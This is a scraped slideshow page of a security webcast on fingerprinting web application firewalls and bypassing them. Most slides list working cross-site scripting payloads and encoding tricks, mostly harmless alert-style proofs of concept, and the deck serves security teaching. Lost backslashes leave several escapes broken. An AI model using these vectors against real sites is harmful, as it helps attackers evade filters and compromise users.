Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
Ranchoddas Series
“Bypassing Modern WAF's Exemplified At XSS” by Rafay Baloch
http://www.rafayhackingarticles.net
Agenda
• What is a WAF?
• WAF Primary Operation Models.
• Fingerprinting WAF.
• Automated Fingerprinting.
• WAF Bypass Met...
What/What Not To Expect?
• The author pre-assumes that the reader has basic knowledge
of javaScript and XSS.
• This is not...
Layers of Insecurity
What is a WAF?
“A WAF may be a Hardware/Software that sits between the
Client and Web Application in order to Determine/Bl...
WAF Primary Operation Models
• Positive Model (Whitelist) – Accept Known good
• Negative Model (Blacklist) – Reject Known ...
Secret To WAF Bypass?
“All WAF’s Can Be Bypassed”
Fingerprinting WAF
Fingerprinting QWAF
WAF Bypass Techniques
• Cookie Values
• HTTP Response Codes
• Connection Close
• Server Cloaking
…
Citrix Netscaler [Cookie Values]
F5 Big IP ASM [Cookie Values]
Webknight [HTTP Response Codes]
Dot Defender [HTTP Response Codes]
Wafw00f
WAFW00f Techniques
Cookies : Keeping track of the cookies inside the http request.
HTTP Responses : Sending a malicious re...
WafW00f [Attack Pattern]
Wafw00f Techniques
Wafw00f Techniques
http-waf-fingerprint Script
WAF Bypass Methodologies
• Brute Forcing : Throwing random payloads hoping for one of
them to execute.
• Regular Expressio...
Brute Forcing
<dialog open="" onclose="alert(1)"><form method="dialog"
><button>Close me!</button></form></dialog>
<iframe...
Brute Forcing
<svg xmlns:xlink="http://www.w3.org/1999/xlink"><a><circle
r=100 /><animate attributeName="xlink:href" value...
Brute Forcing
<isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1)
type=image> //CHROME
<marquee<marquee/onstart=c...
Regular Expression Reversing
• Perhaps the best way of Bypassing any WAF (98% Success).
• WAF rules are mostly made up of ...
Rule 1: Injecting Harmless HTML
Rule 1: Inject harmless HTML tags such as <b>, <i>, <u>
Take a Note of Following:
• Are <,...
Rule 2: Injecting HTML Entities
Rule 2: Injecting HTML entities to check if filter is decoding
any entities.
Injecting HTM...
Rule 3: Injecting Script Tag
Rule 3: Injecting Script Tag and it’s variations to construct a
Bypass.
<sCRiPt>alert(1);</sC...
Rule 3: Injecting Script Tag
<svg><script>alert&grave;1&grave;<p> // Using ES6
<svg><script>alert&DiacriticalGrave;1&Diacr...
Rule 4: Testing For Recursive Filters
Rule 4: Testing if filter is replacing malicious
tags/characters with whitespaces.
I...
Rule 5: Injecting Anchor Tag
Rule 5: Injecting anchor tag and it’s variants to check for
potential bypasses.
Injecting:
<a...
Rule 5: Injecting Anchor Tag
Injecting:
<a href=”javascript:”>Clickme</a>
<a href=”javaScrRipt:alert(1)”>Clickme</a>
Take ...
Rule 5: Injecting Anchor Tag
<a/href="j&Tab;a&Tab;v&Tab;asc&Tab;ri&Tab;pt:confirm&lpar;1&rpar;">
Click<test>
<a href="j&Ta...
Rule 5: Injecting Anchor Tag
<a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;
u0061u006Cu0065u0072u0074&lpar;1&rpar...
Rule 6: Testing For Event Handlers
Rule 6: Injecting event handlers to see if a bypass is
possible (With User Interaction)...
Rule 7: Input Less Common Event Handlers
Rule 7: Injecting less common event handlers along with other
html tags .
Injecti...
Rule 8: Testing With SRC Attribute
Rule 8: Injecting payloads that use src attribute in order to
execute javaScript, a not...
Rule 9: Testing With action Attribute
Rule 9: Injecting payloads that use “action” attribute in
order to execute javaScrip...
Rule 9: Testing With action Attribute
Injecting:
<isindex x="javascript:" onmouseover="alert(1)" label="test">
// Giuseppe...
Rule 10: Injecting HTML 5 Based Payloads
Rule 10: Many firewalls are not tuned for filtering out
HTML5 tags, therefore the...
Exotic XSS Vectors
<svg>
<use
xlink:href="data:image&sol;svg&plus;xml&semi;ba&NewLine;
se&Tab;64&semi;
&yaXB0OmFsZXJ0KGxvY...
Exotic XSS Vectors
<div onfocus=alert('xx') id=xss style=display:table>
// IE 7-11 Ben Hayak
<div style=overflow:-webkit-m...
Bypassing Keyword Based Filters
• Many firewalls are focused on preventing keywords such as
alert, confirm, prompt etc in ...
Character Escapes
Variations for alert(1)
<script>u0061u006Cu0065u0072u0074(1)</script> // Unicode escapes
<script>u0061u0...
Character Escapes
Variations for alert(1)
<script>eval("x61x6cx65x72x74(1)");</script>
// Hexadecimal escapes using eval
<...
String Concatenation
Alternative Execution Sinks
<script>setTimeout("a" + "lert" + "(1)");</script>
// Using Basic Concatenation
<img src=a one...
Entity Decoding
Input Supplied
<a href="
&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&
#110&#102&#105&#114...
Entity Decoding
Input Supplied (Double Encoding)
<a href="
&#38&#35&#49&#48&#54&#38&#35&#57&#55&#38&#35&#49&#49&#56&#38&
#...
Entity Decoding
Response
<a href=
“&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111
&#110&#102&#105&#114&#109&...
Bypassing Real World Filter
Demo: https://hack.me/101575/bypass-blacklist-based-waf-challenge.
html
Browser Based Bugs
• Browser bugs are one of the last options if first two
options fails.
• Most effective when it comes t...
Null Bytes
Internet explorer up till version 9 ignores null bytes.
Many firewalls still are vulnerable to this attack vect...
Unicode Separators
(?i)([s"'`;/0-9=]+onw+s*=)
Unicode Separators
• There are characters which are treated by browsers as White
Space Characters.
• The “s" meta-characte...
Unicode Separators
• Security Researcher Masato Kinugawa has already fuzzed the
following control characters that are trea...
Charset Inheritance Bugs
• There are multiple encoding systems for the web, this is
required to ensure that a communicatio...
UTF-32 Based XSS
UTF-32 XSS
• IE does not support UTF-32 Charset.
• IE ignores Null Byte characters Up till Version 9.
• In UTF-32, a singl...
UTF-32 XSS
∀ U+2200 = [0x00][0x00][0x22][0x00]
㸀 U+3E00 = [0x00][0x00][0x3E][0x00]
㰀 U+3C00 = [0x00][0x00][0x3C][0x00]
Equ...
UTF-32 XSS
∀ U+2200 = [0x00][0x00][0x22][0x00]
㸀 U+3E00 = [0x00][0x00][0x3E][0x00]
㰀 U+3C00 = [0x00][0x00][0x3C][0x00]
Equ...
Conclusion
• Blacklisting will only buy you time, will not prevent attacks.
• Secure Coding Practices (Input validation, S...
Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified At XSS by Rafay Baloch
Upcoming SlideShare
Loading in …5
×

Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified At XSS by Rafay Baloch

2,350 views

Published on

Presentation slides of Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified At XSS by Rafay Baloch. Ask all your question's related to the webcast here http://goo.gl/Vv10hJ. Don't forget to leave you feedback here https://goo.gl/YrBeic.

Published in: Education

Garage4Hackers Ranchoddas Webcast Series - Bypassing Modern WAF's Exemplified At XSS by Rafay Baloch

  1. 1. Ranchoddas Series “Bypassing Modern WAF's Exemplified At XSS” by Rafay Baloch http://www.rafayhackingarticles.net
  2. 2. Agenda • What is a WAF? • WAF Primary Operation Models. • Fingerprinting WAF. • Automated Fingerprinting. • WAF Bypass Methodologies. • Bypassing Keyword Based Filters • Entity Decoding • Bypassing Real World Filter • Comments And Take Aways.
  3. 3. What/What Not To Expect? • The author pre-assumes that the reader has basic knowledge of javaScript and XSS. • This is not a WAF 101 talk, We will not be covering all the aspects of WAF Bypasses. • We will not be disclosing Zero Days, However we will teach you how to find one.
  4. 4. Layers of Insecurity
  5. 5. What is a WAF? “A WAF may be a Hardware/Software that sits between the Client and Web Application in order to Determine/Block malicious requests before they are sent to the web Application.” Modes • Passive Mode • Reactive Mode
  6. 6. WAF Primary Operation Models • Positive Model (Whitelist) – Accept Known good • Negative Model (Blacklist) – Reject Known Bad • Mixed Model – Combination of both
  7. 7. Secret To WAF Bypass? “All WAF’s Can Be Bypassed”
  8. 8. Fingerprinting WAF
  9. 9. Fingerprinting QWAF
  10. 10. WAF Bypass Techniques • Cookie Values • HTTP Response Codes • Connection Close • Server Cloaking …
  11. 11. Citrix Netscaler [Cookie Values]
  12. 12. F5 Big IP ASM [Cookie Values]
  13. 13. Webknight [HTTP Response Codes]
  14. 14. Dot Defender [HTTP Response Codes]
  15. 15. Wafw00f
  16. 16. WAFW00f Techniques Cookies : Keeping track of the cookies inside the http request. HTTP Responses : Sending a malicious request and observing http response codes. Drop Packets : Utilizing drop packets such as FIN and RST. Server cloaking : Modifying URL and different altering methods such as HTTP response rewriting. Pre-Built Rules : Testing for pre-built negative signatures which vary from a WAF to a WAF.
  17. 17. WafW00f [Attack Pattern]
  18. 18. Wafw00f Techniques
  19. 19. Wafw00f Techniques
  20. 20. http-waf-fingerprint Script
  21. 21. WAF Bypass Methodologies • Brute Forcing : Throwing random payloads hoping for one of them to execute. • Regular Expression Reversing : Taking a note of what’s blocked and what’s not blocked in order ton construct a bypass. • Browser Bugs : Utilizing known/unknown browser bugs in order to construct a bypass.
  22. 22. Brute Forcing <dialog open="" onclose="alert(1)"><form method="dialog" ><button>Close me!</button></form></dialog> <iframe/src="data:text/html,<svg%0A%0B%0C%0D%A0%00% 20onload=confirm(1);>";> <svg%09%0A%0C%0D20onload=confirm(1);> <svg////////onload=confirm(1);> <video src=_ onloadstart="alert(1)">
  23. 23. Brute Forcing <svg xmlns:xlink="http://www.w3.org/1999/xlink"><a><circle r=100 /><animate attributeName="xlink:href" values="; javascript:alert(1)" begin="0s" dur="0.1s" fill="freeze"/> <input type="text" value=""onresize=pompt(1) "> //IE 10 docmode <a href="javascript:alert(1)">CLICK ME<a>
  24. 24. Brute Forcing <isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image> //CHROME <marquee<marquee/onstart=confirm(2)>/onstart=confirm(1)>
  25. 25. Regular Expression Reversing • Perhaps the best way of Bypassing any WAF (98% Success). • WAF rules are mostly made up of regular expressions. • In Regex reversing, we identify all possible variations of malicious. Input WAF is blocking. • Hence, we know what it’s not blocking and based upon that We construct a Bypass.
  26. 26. Rule 1: Injecting Harmless HTML Rule 1: Inject harmless HTML tags such as <b>, <i>, <u> Take a Note of Following: • Are <, > tags being html encoded or stripped? • Are both < and > tags or one of them is being stripped?
  27. 27. Rule 2: Injecting HTML Entities Rule 2: Injecting HTML entities to check if filter is decoding any entities. Injecting HTML Entities: &lt;b&gt; u003cbu003e x3cbx3e
  28. 28. Rule 3: Injecting Script Tag Rule 3: Injecting Script Tag and it’s variations to construct a Bypass. <sCRiPt>alert(1);</sCRipT> // Test if filter is only blocking lowercase <SCriPt>delete alert;alert(1)</sCriPt> <script%20src="//www.dropbox.com/s/hp796og5p9va7zt/face.js?dl=1">
  29. 29. Rule 3: Injecting Script Tag <svg><script>alert&grave;1&grave;<p> // Using ES6 <svg><script>alert&DiacriticalGrave;1&DiacriticalGrave;<p> // Using ES6 Variation <svg><script>alert`1` // Using ES6 Variation <script confirm(1);</script> // Injecting a newline
  30. 30. Rule 4: Testing For Recursive Filters Rule 4: Testing if filter is replacing malicious tags/characters with whitespaces. In case, if our input <script>alert(1);</script> leads to alert(1) inside the response body, we can inject the following: <scr<script>ipt>alert(1);</scr</script>ipt> <scr<iframe>ipt>alert(1);</scr</iframe>ipt> Will lead to: <script>alert(1);</script>
  31. 31. Rule 5: Injecting Anchor Tag Rule 5: Injecting anchor tag and it’s variants to check for potential bypasses. Injecting: <a href=“http://www.google.com”>Clickme</a> Take a Note of Following: • Was <a> tag stripped out completely? • Was “href” attribute stripped out?
  32. 32. Rule 5: Injecting Anchor Tag Injecting: <a href=”javascript:”>Clickme</a> <a href=”javaScrRipt:alert(1)”>Clickme</a> Take a Note of Following: • Was the whole javascript keyword stripped? • Was the “:” part stripped? • Was alert keyword stripped? • Were parenthesis stripped?
  33. 33. Rule 5: Injecting Anchor Tag <a/href="j&Tab;a&Tab;v&Tab;asc&Tab;ri&Tab;pt:confirm&lpar;1&rpar;"> Click<test> <a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon;confirm&lpar; 1&rpar;">Click<test>
  34. 34. Rule 5: Injecting Anchor Tag <a href="j&Tab;a&Tab;v&Tab;asc&NewLine;ri&Tab;pt&colon; u0061u006Cu0065u0072u0074&lpar;1&rpar;">Click<test> <a href='javascript:http://@cc_on/confirm%28location%29'> click</a>
  35. 35. Rule 6: Testing For Event Handlers Rule 6: Injecting event handlers to see if a bypass is possible (With User Interaction) Injecting: <a href="rhainfosec.com" onclimbatree=alert(1)>ClickHere</a> Take a Note of Following: • If the “onclimbtree” part get’s stripped, it means the filter is blocking all event handlers, if not we can try injecting less common event handlers.
  36. 36. Rule 7: Input Less Common Event Handlers Rule 7: Injecting less common event handlers along with other html tags . Injecting: <form oninput=alert(1)></input></form> <q/oncut=alert(1)> <body/onhashchange=alert(1)><a href=#>clickit --><d/ /ondrag=cou006efiru006d(2)>hello.
  37. 37. Rule 8: Testing With SRC Attribute Rule 8: Injecting payloads that use src attribute in order to execute javaScript, a note must be taken if the src attribute itself is being blocked or the tag. . Injecting: <img src=x onerror=prompt(1);> <img/src=aaa.jpg onerror=prompt(1);> <video src=x onerror=prompt(1);> <audio src=x onerror=prompt(1);> <iframe src=x onerror=prompt(1)> <embed/src=//goo.gl/nlX0P>
  38. 38. Rule 9: Testing With action Attribute Rule 9: Injecting payloads that use “action” attribute in order to execute javaScript, a note must be taken if the action attribute itself is being blocked or the tag. . Injecting: <form action="Javascript:alert(1)"><input type=submit> <isindex action="javascript:alert(1)" type=image> <isindex action=j&Tab;a&Tab;vas&Tab;c&Tab;r&Tab;ipt:alert(1) type=image>
  39. 39. Rule 9: Testing With action Attribute Injecting: <isindex x="javascript:" onmouseover="alert(1)" label="test"> // Giuseppe Trotta <form/action='data:text&sol;html,&lt;script&gt;alert(1) &lt/script&gt'><button>CLICK // .mario <button form=x>xss<form id=x action="javas&Tab;cript:alert (1)">
  40. 40. Rule 10: Injecting HTML 5 Based Payloads Rule 10: Many firewalls are not tuned for filtering out HTML5 tags, therefore the following payloads can sometimes come very handy when attempting to bypass firewall. Injecting: <marquee/onstart=confirm(2)>/ <body onload=prompt(1);> <select autofocus onfocus=alert(1)> <textarea autofocus onfocus=alert(1)> <keygen autofocus onfocus=alert(1)> <video><source onerror="javascript:alert(1)">
  41. 41. Exotic XSS Vectors <svg> <use xlink:href="data:image&sol;svg&plus;xml&semi;ba&NewLine; se&Tab;64&semi; &yaXB0OmFsZXJ0KGxvY2F0aW9uKSI+PHJlY3QgeD0iMCIgeT0iMCIgd2lkdGg 9IjEwMCIgaGVpZ2h0PSIxMDAiIC8+PC9hPg0KPC9zdmc+#rectangle" /></svg> // Alex Infuhr <body/onactivate=URL=name// <svg><div onactivate=alert('Xss') id=xss style=overflow: scroll> // IE 7-11 by BenHayak
  42. 42. Exotic XSS Vectors <div onfocus=alert('xx') id=xss style=display:table> // IE 7-11 Ben Hayak <div style=overflow:-webkit-marquee onscroll=alert(1)> // Masato Kinugawa <anything onbeforescriptexecute=confirm(1)> // .mario
  43. 43. Bypassing Keyword Based Filters • Many firewalls are focused on preventing keywords such as alert, confirm, prompt etc in order to block script execution. • In that case, we can utilize various techniques such as character escapes, String concatenation, Non-Alphanumeric JS in order to bypass filters.  
  44. 44. Character Escapes Variations for alert(1) <script>u0061u006Cu0065u0072u0074(1)</script> // Unicode escapes <script>u0061u006Cu0065u0072u0074`1`</script> // ES6 Variation
  45. 45. Character Escapes Variations for alert(1) <script>eval("x61x6cx65x72x74(1)");</script> // Hexadecimal escapes using eval <script>eval("141154145162164`1`")</script> // Octal escapes combined ES6
  46. 46. String Concatenation
  47. 47. Alternative Execution Sinks <script>setTimeout("a" + "lert" + "(1)");</script> // Using Basic Concatenation <img src=a onerror=setInterval(String['fromCharCode'] (97,108,101,114,116,40,39,120,115,115,39,41,32))> // Using String.fromcharcode function <script>setTimeout(/a/.source + /lert/.source + "(1)"); </script> // Using source property for concatenation
  48. 48. Entity Decoding Input Supplied <a href=" &#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111& #110&#102&#105&#114&#109&#40&#49&#41">Click Here</a> Response <a href="javascript:confirm(1)">Clickhere</a>
  49. 49. Entity Decoding Input Supplied (Double Encoding) <a href=" &#38&#35&#49&#48&#54&#38&#35&#57&#55&#38&#35&#49&#49&#56&#38& #35&#57&#55&#38&#35&#49&#49&#53&#38&#35&#57&#57&#38&#35&#49&# 49&#52&#38&#35&#49&#48&#53&#38&#35&#49&#49&#50&#38&#35&#49&#4 9&#54&#38&#35&#53&#56&#38&#35&#57&#57&#38&#35&#49&#49&#49&#38 &#35&#49&#49&#48&#38&#35&#49&#48&#50&#38&#35&#49&#48&#53&#38& #35&#49&#49&#52&#38&#35&#49&#48&#57&#38&#35&#52&#48&#38&#35&# 52&#57&#38&#35&#52&#49">Clickhere</a>
  50. 50. Entity Decoding Response <a href= “&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111 &#110&#102&#105&#114&#109&#40&#49&#41">Clickhere</a>
  51. 51. Bypassing Real World Filter Demo: https://hack.me/101575/bypass-blacklist-based-waf-challenge. html
  52. 52. Browser Based Bugs • Browser bugs are one of the last options if first two options fails. • Most effective when it comes to bypass WAF’s and any other client side filters. • Browser Bugs mostly exist in form of parsing bugs, charset bugs or abusing client side filters in order to execute javaScript.  
  53. 53. Null Bytes Internet explorer up till version 9 ignores null bytes. Many firewalls still are vulnerable to this attack vector. <scx00ript>alert(1);</sx00cript>
  54. 54. Unicode Separators (?i)([s"'`;/0-9=]+onw+s*=)
  55. 55. Unicode Separators • There are characters which are treated by browsers as White Space Characters. • The “s" meta-character does not cover all possible control characters. Bypass For ModSecurity (IE9) <a onmouseover%0B=location=% 27x6Ax61x76x61x53x43x52x49x50x54x26x63x6Fx6Cx6 Fx6Ex3Bx63x6Fx6Ex66x69x72x6Dx26x6Cx70x61x72x3B x64x6Fx63x75x6Dx65x6Ex74x2Ex63x6Fx6Fx6Bx69x65 x26x72x70x61x72x3B%27>
  56. 56. Unicode Separators • Security Researcher Masato Kinugawa has already fuzzed the following control characters that are treated by browsers as whitespace. IExplorer = [0x09,0x0B,0x0C,0x20,0x3B] Chrome = [0x09,0x20,0x28,0x2C,0x3B] Safari = [0x2C,0x3B] FireFox = [0x09,0x20,0x28,0x2C,0x3B] Opera = [0x09,0x20,0x2C,0x3B] Android = [0x09,0x20,0x28,0x2C,0x3B]
  57. 57. Charset Inheritance Bugs • There are multiple encoding systems for the web, this is required to ensure that a communication follows some “rules”. • Charset is the set of characters allowed for a specific encoding system. • Currently, UTF-8 contains largest set of characters, therefore it is widely used. • In a charset inheritance vulnerability, an origin inherits a charset from another origin.
  58. 58. UTF-32 Based XSS
  59. 59. UTF-32 XSS • IE does not support UTF-32 Charset. • IE ignores Null Byte characters Up till Version 9. • In UTF-32, a single character is equal to 32 bytes. Vector Sent: ∀㸀㰀script㸀alert(1)㰀/script㸀
  60. 60. UTF-32 XSS ∀ U+2200 = [0x00][0x00][0x22][0x00] 㸀 U+3E00 = [0x00][0x00][0x3E][0x00] 㰀 U+3C00 = [0x00][0x00][0x3C][0x00] Equivalent to: "><script>alert(1)</script>
  61. 61. UTF-32 XSS ∀ U+2200 = [0x00][0x00][0x22][0x00] 㸀 U+3E00 = [0x00][0x00][0x3E][0x00] 㰀 U+3C00 = [0x00][0x00][0x3C][0x00] Equivalent to: "><script>alert(1)</script>
  62. 62. Conclusion • Blacklisting will only buy you time, will not prevent attacks. • Secure Coding Practices (Input validation, Source Code Analysis, Pentesting ) etc In development phase. • We have to try many permutation/combinations before getting to a bypass.

×